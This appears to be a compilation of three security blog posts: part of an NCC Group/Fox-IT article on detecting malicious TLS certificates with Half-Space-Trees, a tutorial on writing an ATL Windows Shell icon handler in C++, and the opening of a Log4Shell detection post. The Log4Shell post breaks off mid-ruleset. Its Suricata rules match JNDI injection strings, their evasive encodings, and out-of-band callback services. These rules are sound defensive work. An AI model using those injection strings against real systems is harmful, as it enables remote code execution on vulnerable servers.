The HST is also an ensemble method, meaning it builds multiple half-space-trees. A single half-space-tree bisects the window (space) into half-spaces based on the features in the data. Every single half-space-tree does this randomly and continues until the set height of the tree is reached. The half-space-tree counts the number of data points per subspace and assigns a mass score to that subspace (represented by the colors). 

The subspaces where most data points fall are considered high-mass subspaces, and the subspaces with few or no data points are considered low-mass subspaces. Most data points are expected to fall in high-mass subspaces because they need many more splits (i.e., a higher tree) to be isolated. The sum of the mass of all half-space-trees becomes the final anomaly score of the HST (xiii). Calculating mass is a different approach than looking at the number of splits (as conducted in the Isolation Forest). Even so, using recursive methods, calculating the mass profile remains a simple and fast way of profiling data points in streaming data (xiii). 

Moreover, the HST works with two consecutive windows: the reference window and the latest window. The HST learns the mass profile in the reference window and uses it as a reference for new incoming data in the latest window. Without going too deep into the workings of the windows, it is worth mentioning that the reference window is updated every time the latest window is full. Namely, when the latest window is full, its mass profile is copied over to the reference window and the latest window is cleared so new data can come in. By updating its windows in this way, the HST is robust against evolving streaming data (xiii). 

The anomaly score output by HSTs falls between 0 and 1. The closer the anomaly score is to 1, the easier it was to isolate the certificate and the more likely it is that the certificate is anomalous. Testing HSTs on our initially collated data, we were satisfied that this was a robust approach to the problem, with the Ryuk ransomware certificate repeatedly identified with an anomaly score of 0.84.
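
For readers who want to experiment, a minimal sketch using the open-source River library (referenced in [i]) is shown below; the feature dictionaries and parameter values are illustrative assumptions, not our production configuration.

# Minimal sketch: score streaming certificate features with Half-Space-Trees (River).
from river import anomaly, compose, preprocessing

# HST expects features scaled to [0, 1], hence the MinMaxScaler in front.
model = compose.Pipeline(
    preprocessing.MinMaxScaler(),
    anomaly.HalfSpaceTrees(n_trees=25, height=8, window_size=250, seed=42),
)

stream = [
    {"empty_attributes": 0, "self_signed": 0.0, "subject_length": 95},   # benign-looking
    {"empty_attributes": 1, "self_signed": 1.0, "subject_length": 58},   # Ryuk-like
]

for x in stream:
    score = model.score_one(x)   # anomaly score between 0 and 1
    model.learn_one(x)           # update the model incrementally
    print(round(score, 3))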

The importance of feedback loops – going from research to production

As a provider of managed cyber security services, we are fortunate to have a number of close customers who were willing to deploy the model in a controlled setting on live network traffic. In conjunction with quick feedback from human analysts on the anomaly scores being output, it was possible to optimize the model to ensure that it produced sensible scoring across a wide range of environments. Having achieved credibility, the model could be more widely deployed. In an example of the economic concept of “network effects”, the more environments the model was deployed on, the more its performance improved and the better it adapted to the unique environment in which it operates. 

Whilst high anomaly scores do not necessarily indicate malicious behavior, they are a measure of weirdness or novelty. By combining the anomaly scoring obtained from HSTs with other metrics or rules derived in real time, it has become possible to classify malicious activity with greater certainty.

Machines can learn to detect suspicious TLS certificates 

An unsupervised, incremental anomaly detection model is applied in our security operations centers and is now part of our commercial offerings. We would like to encourage other cyber security defenders to look at the characteristics of TLS certificates to detect malicious activities even when traffic is encrypted. Encryption does not equal invisibility, and there is often (meta)data to consider. Accordingly, it requires different approaches to searching for malicious activity. In particular, as a Data Science team we found that Half-Space-Trees is an effective and quick anomaly detector for streaming network data. 

References 

[i] NCC Group & Fox-IT. (2021). “Incremental Machine Learning by Example: Detecting Suspicious Activity with Zeek Data Streams, River, and JA3 Hashes.”
https://research.nccgroup.com/2021/06/14/incremental-machine-leaning-by-example-detecting-suspicious-activity-with-zeek-data-streams-river-and-ja3-hashes/

[ii] Van Luijk, R. (2020) “Hunting for beacons.” Fox-IT.

[iii] Van Luijk, R., Postma, A. (2019). “Using Anomaly Detection to Find Malicious Domains” Fox-IT < https://blog.fox-it.com/2019/06/11/using-anomaly-detection-to-find-malicious-domains/ >

[iv] https://protonmail.com/blog/tls-ssl-certificate/

[v] https://attack.mitre.org/techniques/T1608/003/

[vi] Mokbel, M. (2021). “The State of SSL/TLS Certificate Usage in Malware C&C Communications.” Trend Micro.
https://www.trendmicro.com/en_us/research/21/i/analyzing-ssl-tls-certificates-used-by-malware.html

[vii] https://sslbl.abuse.ch/statistics/

[viii] Cooper, D., Santesson, S., Farrell, S., Boeyen, S., Housley, R., and W. Polk. (2008). “Internet X.509 Public Key Infrastructure Certificate and Certificate Revocation List (CRL) Profile”, RFC 5280, DOI 10.17487/RFC5280.
https://datatracker.ietf.org/doc/html/rfc5280

[ix] https://attack.mitre.org/software/S0446/

[x] Goody, K., Kennelly, J., Shilko, J. Elovitz, S., Bienstock, D. (2020). “Kegtap and SingleMalt with Ransomware Chaser.” FireEye.
https://www.fireeye.com/blog/jp-threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html

[xi] Liu, F. T. , Ting, K. M. & Zhou, Z. (2008). “Isolation Forest”. Eighth IEEE International Conference on Data Mining, pp. 413-422, doi: 10.1109/ICDM.2008.17.
https://ieeexplore.ieee.org/document/4781136

[xii] Togbe, M.U., Chabchoub, Y., Boly, A., Barry, M., Chiky, R., & Bahri, M. (2021). “Anomalies Detection Using Isolation in Concept-Drifting Data Streams.” Comput., 10, 13.
https://www.mdpi.com/2073-431X/10/1/13

[xiii] Tan, S. Ting, K. & Liu, F. (2011). “Fast Anomaly Detection for Streaming Data.” 1511-1516. 10.5591/978-1-57735-516-8/IJCAI11-254.
https://www.ijcai.org/Proceedings/11/Papers/254.pdf

Icon Handler with ATL

11 December 2021 at 11:32

One of the exercises I gave at the recent COM Programming class was to build an Icon Handler that integrates with the Windows Shell, where DLLs should have an icon based on their “bitness” – whether they’re 64-bit or 32-bit Portable Executable (PE).

The Shell provides many opportunities for extensibility. An Icon Handler is one of the simplest, but still requires writing a full-fledged COM component that implements certain interfaces that the shell expects. Here is the result of using the Icon Handler DLL, showing the folders c:\Windows\System32 and c:\Windows\SysWow64 (large icons for easier visibility).

C:\Windows\System32
C:\Windows\SysWow64

Let’s see how to build such an icon handler. The full code is at zodiacon/DllIconHandler.

The first step is to create a new ATL project in Visual Studio. I’ll be using Visual Studio 2022, but any recent version would work essentially the same way (e.g. VS 2019, or 2017). Locate the ATL project type by searching in the terrible new project dialog introduced in VS 2019 and still horrible in VS 2022.

ATL (Active Template Library) is certainly not the only way to build COM components. “Pure” C++ would work as well, but ATL provides all the COM boilerplate such as the required exported functions, class factories, IUnknown implementations, etc. Since ATL is fairly “old”, it lacks the elegance of other libraries such as WRL and WinRT, as it doesn’t take advantage of C++11 and later features. Still, ATL has withstood the test of time, is robust, and full featured when it comes to COM, something I can’t say for these other alternatives.

If you can’t locate the ATL project, you may not have ATL installed propertly. Make sure the C++ Desktop development workload is installed using the Visual Studio Installer.

Click Next and select a project name and location:

Click Create to launch the ATL project wizard. Leave all defaults (Dynamic Link Library) and click OK. Shell extensions of all kinds must be DLLs, as these are loaded by Explorer.exe. It's not ideal in terms of Explorer's stability, as an unhandled exception can bring down the entire process, but this is necessary to get good performance, as no inter-process calls are made.

Two projects are created, named DllIconHandler and DllIconHandlerPS. The latter is a proxy/stub DLL that may be useful if cross-apartment COM calls are made. This is not needed for shell extensions, so the PS project should simply be removed from the solution.


A detailed discussion of COM is way beyond the scope of this post.


The remaining project contains the COM DLL required code, such as the mandatory exported function, DllGetClassObject, and the other optional but recommended exports (DllRegisterServer, DllUnregisterServer, DllCanUnloadNow and DllInstall). This is one of the nice benefits of working with ATL project for COM component development: all the COM boilerplate is implemented by ATL.

The next step is to add a COM class that will implement our icon handler. Again, we’ll turn to a wizard provided by Visual Studio that provides the fundamentals. Right-click the project and select Add Item… (don’t select Add Class as it’s not good enough). Select the ATL node on the left and ATL Simple Object on the right. Set the name to something like IconHandler:

Click Add. The ATL New Object wizard opens up. The name typed in the Add New Item dialog is used as a basis for generating names for source code elements (like the C++ class) and COM elements (that would be written into the IDL file and the resulting type library). Since we’re not going to define a new interface (we need to implement explorer-defined interfaces), there is no real need to tweak anything. You can click Finish to generate the class.

Three files are added with this last step: IconHandler.h, IconHandler.cpp and IconHandler.rgs. The C++ source files' role is obvious – implementing the Icon Handler. The rgs file contains a script in an ATL-provided “language” indicating what information to write to the Registry when this DLL is registered (and what to remove if it's unregistered).

The IDL (Interface Definition Language) file has also been modified, adding the definitions of the wizard generated interface (which we don’t need) and the coclass. We’ll leave the IDL alone, as we do need it to generate the type library of our component because the ATL registration code uses it internally.

If you look in IconHandler.h, you’ll see that the class implements the IIconHandler empty interface generated by the wizard that we don’t need. It even derives from IDispatch:

class ATL_NO_VTABLE CIconHandler :
	public CComObjectRootEx<CComSingleThreadModel>,
	public CComCoClass<CIconHandler, &CLSID_IconHandler>,
	public IDispatchImpl<IIconHandler, &IID_IIconHandler, &LIBID_DLLIconHandlerLib, /*wMajor =*/ 1, /*wMinor =*/ 0> {

We can leave the IDispatchImpl-inheritance, since it’s harmless. But it’s useless as well, so let’s delete it and also delete the interfaces IIconHandler and IDispatch from the interface map located further down:

class ATL_NO_VTABLE CIconHandler :
	public CComObjectRootEx<CComSingleThreadModel>,
	public CComCoClass<CIconHandler, &CLSID_IconHandler> {
public:
	BEGIN_COM_MAP(CIconHandler)
	END_COM_MAP()

(I have rearranged the code a bit). Now we need to add the interfaces we truly have to implement for an icon handler: IPersistFile and IExtractIcon. To get their definitions, we’ll add an #include for <shlobj_core.h> (this is documented in MSDN). We add the interfaces to the inheritance hierarchy, the COM interface map, and use the Visual Studio feature to add the interface members for us by right-clicking the class name (CIconHandler), pressing Ctrl+. (dot) and selecting Implement all pure virtuals of CIconHandler. The resulting class header looks something like this (some parts omitted for clarity) (I have removed the virtual keyword as it’s inherited and doesn’t have to be specified in derived types):

class ATL_NO_VTABLE CIconHandler :
	public CComObjectRootEx<CComSingleThreadModel>,
	public CComCoClass<CIconHandler, &CLSID_IconHandler>,
	public IPersistFile,
	public IExtractIcon {
public:
	BEGIN_COM_MAP(CIconHandler)
		COM_INTERFACE_ENTRY(IPersistFile)
		COM_INTERFACE_ENTRY(IExtractIcon)
	END_COM_MAP()

//...
	// Inherited via IPersistFile
	HRESULT __stdcall GetClassID(CLSID* pClassID) override;
	HRESULT __stdcall IsDirty(void) override;
	HRESULT __stdcall Load(LPCOLESTR pszFileName, DWORD dwMode) override;
	HRESULT __stdcall Save(LPCOLESTR pszFileName, BOOL fRemember) override;
	HRESULT __stdcall SaveCompleted(LPCOLESTR pszFileName) override;
	HRESULT __stdcall GetCurFile(LPOLESTR* ppszFileName) override;

	// Inherited via IExtractIconW
	HRESULT __stdcall GetIconLocation(UINT uFlags, PWSTR pszIconFile, UINT cchMax, int* piIndex, UINT* pwFlags) override;
	HRESULT __stdcall Extract(PCWSTR pszFile, UINT nIconIndex, HICON* phiconLarge, HICON* phiconSmall, UINT nIconSize) override;
};

Now for the implementation. The IPersistFile interface seems non-trivial, but fortunately we just need to implement the Load method for an icon handler. This is where we get the file name we need to inspect. To check whether a DLL is 64 or 32 bit, we’ll add a simple enumeration and a helper function to the CIconHandler class:

	enum class ModuleBitness {
		Unknown,
		Bit32,
		Bit64
	};
	static ModuleBitness GetModuleBitness(PCWSTR path);

The implementation of IPersistFile::Load looks something like this:

HRESULT __stdcall CIconHandler::Load(LPCOLESTR pszFileName, DWORD dwMode) {
    ATLTRACE(L"CIconHandler::Load %s\n", pszFileName);

    m_Bitness = GetModuleBitness(pszFileName);
    return S_OK;
}

The method receives the full path of the DLL we need to examine. How do we know that only DLL files will be delivered? This has to do with the registration we’ll make for the icon handler. We’ll register it for DLL file extensions only, so that other file types will not be provided. Calling GetModuleBitness (shown later) performs the real work of determining the DLL’s bitness and stores the result in m_Bitness (a data member of type ModuleBitness).

All that’s left to do is tell explorer which icon to use. This is the role of IExtractIcon. The Extract method can be used to provide an icon handle directly, which is useful if the icon is “dynamic” – perhaps generated by different means in each case. In this example, we just need to return one of two icons which have been added as resources to the project (you can find those in the project source code. This is also an opportunity to provide your own icons).

For our case, it’s enough to return S_FALSE from Extract that causes explorer to use the information returned from GetIconLocation. Here is its implementation:

HRESULT __stdcall CIconHandler::GetIconLocation(UINT uFlags, PWSTR pszIconFile, UINT cchMax, int* piIndex, UINT* pwFlags) {
    if (s_ModulePath[0] == 0) {
        ::GetModuleFileName(_AtlBaseModule.GetModuleInstance(), 
            s_ModulePath, _countof(s_ModulePath));
        ATLTRACE(L"Module path: %s\n", s_ModulePath);
    }
    if (s_ModulePath[0] == 0)
        return S_FALSE;

    if (m_Bitness == ModuleBitness::Unknown)
        return S_FALSE;

    wcscpy_s(pszIconFile, wcslen(s_ModulePath) + 1, s_ModulePath);
    ATLTRACE(L"CIconHandler::GetIconLocation: %s bitness: %d\n", 
        pszIconFile, m_Bitness);
    *piIndex = m_Bitness == ModuleBitness::Bit32 ? 0 : 1;
    *pwFlags = GIL_PERINSTANCE;

    return S_OK;
}

The method’s purpose is to return the current (our icon handler DLL) module’s path and the icon index to use. This information is enough for explorer to load the icon itself from the resources. First, we get the module path to where our DLL has been installed. Since this doesn’t change, it’s only retrieved once (with GetModuleFileName) and stored in a static variable (s_ModulePath).

If this fails (unlikely) or the bitness could not be determined (maybe the file was not a PE at all, but just had such an extension), then we return S_FALSE. This tells explorer to use the default icon for the file type (DLL). Otherwise, we store 0 or 1 in piIndex, based on the IDs of the icons (0 corresponds to the lower of the IDs).

Finally, we need to set a flag inside pwFlags to indicate to explorer that this icon extraction is required for every file (GIL_PERINSTANCE). Otherwise, explorer calls IExtractIcon just once for any DLL file, which is the opposite of what we want.

The final piece of the puzzle (in terms of code) is how to determine whether a PE is 64 or 32 bit. This is not the point of this post, as any custom algorithm can be used to provide different icons for different files of the same type. For completeness, here is the code with comments:

CIconHandler::ModuleBitness CIconHandler::GetModuleBitness(PCWSTR path) {
    auto bitness = ModuleBitness::Unknown;
    //
    // open the DLL as a data file
    //
    auto hFile = ::CreateFile(path, GENERIC_READ, FILE_SHARE_READ, 
        nullptr, OPEN_EXISTING, 0, nullptr);
    if (hFile == INVALID_HANDLE_VALUE)
        return bitness;

    //
    // create a memory mapped file to read the PE header
    //
    auto hMemMap = ::CreateFileMapping(hFile, nullptr, PAGE_READONLY, 0, 0, nullptr);
    ::CloseHandle(hFile);
    if (!hMemMap)
        return bitness;

    //
    // map the first page (where the header is located)
    //
    auto p = ::MapViewOfFile(hMemMap, FILE_MAP_READ, 0, 0, 1 << 12);
    if (p) {
        auto header = ::ImageNtHeader(p);
        if (header) {
            auto machine = header->FileHeader.Machine;
            bitness = header->Signature == IMAGE_NT_OPTIONAL_HDR64_MAGIC ||
                machine == IMAGE_FILE_MACHINE_AMD64 || machine == IMAGE_FILE_MACHINE_ARM64 ?
                ModuleBitness::Bit64 : ModuleBitness::Bit32;
        }
        ::UnmapViewOfFile(p);
    }
    ::CloseHandle(hMemMap);
    
    return bitness;
}

To make all this work, there is still one more concern: registration. Normal COM registration is necessary (so that the call to CoCreateInstance issued by explorer has a chance to succeed), but not enough. Another registration is needed to let explorer know that this icon handler exists, and is to be used for files with the extension “DLL”.

Fortunately, ATL provides a convenient mechanism to add Registry settings using a simple script-like configuration, which does not require any code. The added keys/values have been placed in DllIconHandler.rgs like so:

HKCR
{
	NoRemove DllFile
	{
		NoRemove ShellEx
		{
			IconHandler = s '{d913f592-08f1-418a-9428-cc33db97ed60}'
		}
	}
}

This sets an icon handler in HKEY_CLASSES_ROOT\DllFile\ShellEx, where the IconHandler value specifies the CLSID of our component. You can find the CLSID in the IDL file where the coclass element is defined:

[
	uuid(d913f592-08f1-418a-9428-cc33db97ed60)
]
coclass IconHandler {

Replace this with your own CLSID if you're building the project from scratch. Registration itself is done with the RegSvr32 built-in tool. With an ATL project, a successful build also causes RegSvr32 to be invoked on the resulting DLL, thus performing registration. The default behavior is to register in HKEY_CLASSES_ROOT which uses HKEY_LOCAL_MACHINE behind the covers. This requires running Visual Studio elevated (or an elevated command window if called from outside VS). It will register the icon handler for all users on the machine. If you prefer to register for the current user only (which uses HKEY_CURRENT_USER and does not require running elevated), you can set the per-user registration in VS by going to project properties, clicking on the Linker element and setting per-user redirection:

If you’re registering from outside VS, the per-user registration is achieved with:

regsvr32 /n /i:user <dllpath>

This is it! The full source code is available here.


zodiacon

Log4Shell: Reconnaissance and post exploitation network detection

12 December 2021 at 19:16

Note: This blogpost will be live-updated with new information. NCC Group’s RIFT is intending to publish PCAPs of different exploitation methods in the near future – last updated December 14th at 13:00 UTC

About the Research and Intelligence Fusion Team (RIFT): RIFT leverages our strategic analysis, data science, and threat hunting capabilities to create actionable threat intelligence, ranging from IOCs and detection capabilities to strategic reports on tomorrow’s threat landscape. Cyber security is an arms race where both attackers and defenders continually update and improve their tools and ways of working. To ensure that our managed services remain effective against the latest threats, NCC Group operates a Global Fusion Center with Fox-IT at its core. This multidisciplinary team converts our leading cyber threat intelligence into powerful detection strategies.

In the wake of the CVE-2021-44228 (a.k.a. Log4Shell) vulnerability publication, NCC Group’s RIFT immediately started investigating the vulnerability in order to improve detection and response capabilities mitigating the threat. This blog post is focused on detection and threat hunting, although attack surface scanning and identification are also quintessential parts of a holistic response. Multiple references for prevention and mitigation can be found included at the end of this post.

This blogpost provides Suricata network detection rules that can be used not only to detect exploitation attempts, but also indications of successful exploitation. In addition, a list of indicators of compromise (IOC's) is provided. These IOC's have been observed listening for incoming connections and are thus useful for threat hunting.

Update Wednesday December 15th, 17:30 UTC

We have seen 5 instances in our client base of active exploitation of Mobile Iron during the course of yesterday and today.

Our working hypothesis is that this is a derivative of the details shared yesterday – https://github.com/rwincey/CVE-2021-44228-Log4j-Payloads/blob/main/MobileIron.

The scale of the exposure globally appears significant.

We recommend all Mobile Iron users update immediately.

Ivanti informed us that communication was sent over the weekend to MobileIron Core customers. Ivanti has provided mitigation steps of the exploit listed below on their Knowledge Base. Both NCC Group and Ivanti recommend all customers immediately apply the mitigation within to ensure their environment is protected.

Update Tuesday December 14th, 13:00 UTC

Log4j-finder: finding vulnerable versions of Log4j on your systems

RIFT has published a Python 3 script that can be run on endpoints to check for the presence of vulnerable versions of Log4j. The script requires no dependencies and supports recursively checking the filesystem and inside JAR files to see if they contain a vulnerable version of Log4j. This script can be of great value in determining which systems are vulnerable, and where this vulnerability stems from. The script will be kept up to date with ongoing developments.

It is strongly recommended to run host based scans for vulnerable Log4j versions. Whereas network-based scans attempt to identify vulnerable Log4j versions by attacking common entry points, a host-based scan can find Log4j in unexpected or previously unknown places.

The script can be found on GitHub: https://github.com/fox-it/log4j-finder

JNDI ExploitKit exposes larger attack surface

As shown by the release of an updated JNDI ExploitKit, it is possible to reach remote code execution through serialized payloads instead of referencing a Java .class object in LDAP and subsequently serving that to the vulnerable system. While TrustURLCodebase defaults to false in newer Java versions (6u211, 7u201, 8u191, and 11.0.1) and therefore prevents the LDAP reference vector, depending on the loaded libraries in the vulnerable application it is possible to execute code through Java serialization via both rmi and ldap.

Beware: Centralized logging can result in indirect compromise

This is also highly relevant for organisations using a form of centralised logging. Centralised logging can be used to collect and parse the received logs from the different services and applications running in the environment. We have identified cases where a Kibana server was not exposed to the Internet but because it received logs from several appliances it still got hit by the Log4Shell RCE and started to retrieve Java objects via LDAP.

We were unable to determine if this was due to Logstash being used in the background for parsing the received logs, but this underlines the importance of checking systems configured with centralised logging solutions for vulnerable versions of Log4j, and of not relying on the protection of newer JDK versions that have com.sun.jndi.ldap.object.trustURLCodebase and com.sun.jndi.rmi.object.trustURLCodebase set to false by default.

A warning concerning possible post-exploitation

Although largely eclipsed by Log4Shell, last weekend also saw the emergence of details concerning two vulnerabilities (CVE-2021-42287 and CVE-2021-42278) that reside in the Active Directory component of Microsoft Windows Server editions. Due to the nature of these vulnerabilities, attackers could escalate their privileges in a relatively easy manner as these vulnerabilities have already been weaponised.

It is therefore advised to apply the patches provided by Microsoft in the November 2021 security updates to every domain controller residing in the network, as this is a possible form of post-exploitation if Log4Shell were to be successfully exploited.

Background

Since Log4J is used by many solutions there are significant challenges in finding vulnerable systems and any potential compromise resulting from exploitation of the vulnerability. JNDI (Java Naming and Directory Interface™) was designed to allow distributed applications to look up services in a resource-independent manner, and this is exactly where the bug resulting in exploitation resides. The nature of JNDI allows for defense-evading exploitation attempts that are harder to detect through signatures. An additional problem is the tremendous amount of scanning activity that is currently ongoing. Because of this, investigating every single exploitation attempt is in most situations unfeasible. This means that distinguishing scanning attempts from actual successful exploitation is crucial.

In order to provide detection coverage for CVE-2021-44228, NCC Group's RIFT first created a ruleset that covers as many ways of attempted exploitation of the vulnerability as possible. This initial coverage allowed the collection of Threat Intelligence for further investigation. Most adversaries appear to use a different IP to scan for the vulnerability than they do for listening for incoming victim machines. IOC's for listening IP's / domains are more valuable than those of scanning IP's. After all, a connection from an environment to a known listening IP might indicate a successful compromise, whereas a connection to a scanning IP might merely mean that it has been scanned.

After establishing this initial coverage, our focus shifted to detecting successful exploitation in real time. This can be done by monitoring for rogue JRMI or LDAP requests to external servers. Preferably, this sort of behavior is detected in a port-agnostic way as attackers may choose arbitrary ports to listen on. Moreover, currently a full RCE chain requires the victim machine to retrieve a Java class file from a remote server (caveat: unless exfiltrating sensitive environment variables). For hunting purposes we are able to hunt for inbound Java classes. However, if coverage exists for incoming attacks we are also able to alert on an inbound Java class in a short period of time after an exploitation attempt. The combination of inbound exploitation attempt and inbound Java class is a high confidence IOC that a successful connection has occurred.
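
To make the "inbound Java class" indicator concrete, the following minimal sketch (an illustrative addition, not part of our production tooling; the actual detection is implemented in the Suricata rules below) checks whether a captured payload begins with the compiled Java class magic bytes (CA FE BA BE) that those rules match on.

# Minimal sketch: flag payloads that look like a compiled Java class (magic CA FE BA BE).
JAVA_CLASS_MAGIC = b"\xCA\xFE\xBA\xBE"

def looks_like_java_class(payload: bytes) -> bool:
    return payload.startswith(JAVA_CLASS_MAGIC)

# Example: a payload reassembled from a suspicious inbound TCP stream
print(looks_like_java_class(bytes.fromhex("cafebabe0000003400")))   # True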

This blogpost will continue twofold: we will first provide a set of suricata rules that can be used for:

  1. Detecting incoming exploitation attempts;
  2. Alerting on higher confidence indicators that successful exploitation has occurred;
  3. Generating alerts that can be used for hunting

After providing these detection rules, a list of IOC’s is provided.

Detection Rules

Some of these rules are redundant, as they’ve been written in rapid succession.

# Detects Log4j exploitation attempts
alert http any any -> $HOME_NET any (msg:"FOX-SRT – Exploit – Possible Apache Log4J RCE Request Observed (CVE-2021-44228)"; flow:established, to_server; content:"${jndi:ldap://"; fast_pattern:only; flowbits:set, fox.apachelog4j.rce; threshold:type limit, track by_dst, count 1, seconds 3600; classtype:web-application-attack; priority:3; reference:url, http://www.lunasec.io/docs/blog/log4j-zero-day/; metadata:CVE 2021-44228; metadata:created_at 2021-12-10; metadata:ids suricata; sid:21003726; rev:1;)
alert http any any -> $HOME_NET any (msg:"FOX-SRT – Exploit – Possible Apache Log4J RCE Request Observed (CVE-2021-44228)"; flow:established, to_server; content:"${jndi:"; fast_pattern; pcre:"/\$\{jndi\:(rmi|ldaps|dns)\:/"; flowbits:set, fox.apachelog4j.rce; threshold:type limit, track by_dst, count 1, seconds 3600; classtype:web-application-attack; priority:3; reference:url, http://www.lunasec.io/docs/blog/log4j-zero-day/; metadata:CVE 2021-44228; metadata:created_at 2021-12-10; metadata:ids suricata; sid:21003728; rev:1;)
alert http any any -> $HOME_NET any (msg:"FOX-SRT – Exploit – Possible Defense-Evasive Apache Log4J RCE Request Observed (CVE-2021-44228)"; flow:established, to_server; content:"${jndi:"; fast_pattern; content:!"ldap://"; flowbits:set, fox.apachelog4j.rce; threshold:type limit, track by_dst, count 1, seconds 3600; classtype:web-application-attack; priority:3; reference:url, http://www.lunasec.io/docs/blog/log4j-zero-day/; reference:url, twitter.com/stereotype32/status/1469313856229228544; metadata:CVE 2021-44228; metadata:created_at 2021-12-10; metadata:ids suricata; sid:21003730; rev:1;)
alert http any any -> $HOME_NET any (msg:"FOX-SRT – Exploit – Possible Defense-Evasive Apache Log4J RCE Request Observed (URL encoded bracket) (CVE-2021-44228)"; flow:established, to_server; content:"%7bjndi:"; nocase; fast_pattern; flowbits:set, fox.apachelog4j.rce; threshold:type limit, track by_dst, count 1, seconds 3600; classtype:web-application-attack; priority:3; reference:url, http://www.lunasec.io/docs/blog/log4j-zero-day/; reference:url, https://twitter.com/testanull/status/1469549425521348609; metadata:CVE 2021-44228; metadata:created_at 2021-12-11; metadata:ids suricata; sid:21003731; rev:1;)
alert http any any -> $HOME_NET any (msg:"FOX-SRT – Exploit – Possible Apache Log4j Exploit Attempt in HTTP Header"; flow:established, to_server; content:"${"; http_header; fast_pattern; content:"}"; http_header; distance:0; flowbits:set, fox.apachelog4j.rce.loose; classtype:web-application-attack; priority:3; threshold:type limit, track by_dst, count 1, seconds 3600; reference:url, http://www.lunasec.io/docs/blog/log4j-zero-day/; reference:url, https://twitter.com/testanull/status/1469549425521348609; metadata:CVE 2021-44228; metadata:created_at 2021-12-11; metadata:ids suricata; sid:21003732; rev:1;)
alert http any any -> $HOME_NET any (msg:"FOX-SRT – Exploit – Possible Apache Log4j Exploit Attempt in URI"; flow:established,to_server; content:"${"; http_uri; fast_pattern; content:"}"; http_uri; distance:0; flowbits:set, fox.apachelog4j.rce.loose; classtype:web-application-attack; priority:3; threshold:type limit, track by_dst, count 1, seconds 3600; reference:url, http://www.lunasec.io/docs/blog/log4j-zero-day/; reference:url, https://twitter.com/testanull/status/1469549425521348609; metadata:CVE 2021-44228; metadata:created_at 2021-12-11; metadata:ids suricata; sid:21003733; rev:1;)
# Better and stricter rules, also detects evasion techniques
alert http any any -> $HOME_NET any (msg:"FOX-SRT – Exploit – Possible Apache Log4j Exploit Attempt in HTTP Header (strict)"; flow:established,to_server; content:"${"; http_header; fast_pattern; content:"}"; http_header; distance:0; pcre:/(\$\{\w+:.*\}|jndi)/Hi; xbits:set, fox.log4shell.attempt, track ip_dst, expire 1; threshold:type limit, track by_dst, count 1, seconds 3600; classtype:web-application-attack; reference:url,www.lunasec.io/docs/blog/log4j-zero-day/; reference:url,https://twitter.com/testanull/status/1469549425521348609; metadata:CVE 2021-44228; metadata:created_at 2021-12-11; metadata:ids suricata; priority:3; sid:21003734; rev:1;)
alert http any any -> $HOME_NET any (msg:"FOX-SRT – Exploit – Possible Apache Log4j Exploit Attempt in URI (strict)"; flow:established, to_server; content:"${"; http_uri; fast_pattern; content:"}"; http_uri; distance:0; pcre:/(\$\{\w+:.*\}|jndi)/Ui; xbits:set, fox.log4shell.attempt, track ip_dst, expire 1; classtype:web-application-attack; threshold:type limit, track by_dst, count 1, seconds 3600; reference:url,www.lunasec.io/docs/blog/log4j-zero-day/; reference:url,https://twitter.com/testanull/status/1469549425521348609; metadata:CVE 2021-44228; metadata:created_at 2021-12-11; metadata:ids suricata; priority:3; sid:21003735; rev:1;)
alert http any any -> $HOME_NET any (msg:"FOX-SRT – Exploit – Possible Apache Log4j Exploit Attempt in Client Body (strict)"; flow:to_server; content:"${"; http_client_body; fast_pattern; content:"}"; http_client_body; distance:0; pcre:/(\$\{\w+:.*\}|jndi)/Pi; flowbits:set, fox.apachelog4j.rce.strict; xbits:set,fox.log4shell.attempt,track ip_dst,expire 1; classtype:web-application-attack; threshold:type limit, track by_dst, count 1, seconds 3600; reference:url,www.lunasec.io/docs/blog/log4j-zero-day/; reference:url,https://twitter.com/testanull/status/1469549425521348609; metadata:CVE 2021-44228; metadata:created_at 2021-12-12; metadata:ids suricata; priority:3; sid:21003744; rev:1;)

Detecting outbound connections to probing services

Connections to outbound probing services could indicate a system in your network has been scanned and subsequently connected back to a listening service. This could indicate that a system in your network is/was vulnerable and has been scanned.

# Possible successful interactsh probe
alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"FOX-SRT – Webattack – Possible successful InteractSh probe observed"; flow:established, to_client; content:"200"; http_stat_code; content:"<html><head></head><body>"; http_server_body; fast_pattern; pcre:"/[a-z0-9]{30,36}<\/body><\/html>/QR"; threshold:type limit, track by_dst, count 1, seconds 3600; classtype:misc-attack; reference:url, github.com/projectdiscovery/interactsh; metadata:created_at 2021-12-05; metadata:ids suricata; priority:2; sid:21003712; rev:1;)
alert dns $HOME_NET any -> any 53 (msg:"FOX-SRT – Suspicious – DNS query for interactsh.com server observed"; flow:stateless; dns_query; content:".interactsh.com"; fast_pattern; pcre:"/[a-z0-9]{30,36}\.interactsh\.com/"; threshold:type limit, track by_src, count 1, seconds 3600; reference:url, github.com/projectdiscovery/interactsh; classtype:bad-unknown; metadata:created_at 2021-12-05; metadata:ids suricata; priority:2; sid:21003713; rev:1;)
# Detecting DNS queries for dnslog[.]cn
alert dns any any -> any 53 (msg:"FOX-SRT – Suspicious – dnslog.cn DNS Query Observed"; flow:stateless; dns_query; content:"dnslog.cn"; fast_pattern:only; threshold:type limit, track by_src, count 1, seconds 3600; classtype:bad-unknown; metadata:created_at 2021-12-10; metadata:ids suricata; priority:2; sid:21003729; rev:1;)
# Connections to requestbin.net
alert dns $HOME_NET any -> any 53 (msg:"FOX-SRT – Suspicious – requestbin.net DNS Query Observed"; flow:stateless; dns_query; content:"requestbin.net"; fast_pattern:only; threshold:type limit, track by_src, count 1, seconds 3600; classtype:bad-unknown; metadata:created_at 2021-11-23; metadata:ids suricata; sid:21003685; rev:1;)
alert tls $HOME_NET any -> $EXTERNAL_NET 443 (msg:"FOX-SRT – Suspicious – requestbin.net in SNI Observed"; flow:established, to_server; tls_sni; content:"requestbin.net"; fast_pattern:only; threshold:type limit, track by_src, count 1, seconds 3600; classtype:bad-unknown; metadata:created_at 2021-11-23; metadata:ids suricata; sid:21003686; rev:1;)

Detecting possible successful exploitation

Outbound LDAP(S) / RMI connections are highly uncommon but can be caused by successful exploitation. Inbound Java classes can be suspicious, especially if they arrive shortly after an exploitation attempt.

# Detects possible successful exploitation of Log4j
# JNDI LDAP/RMI Request to External
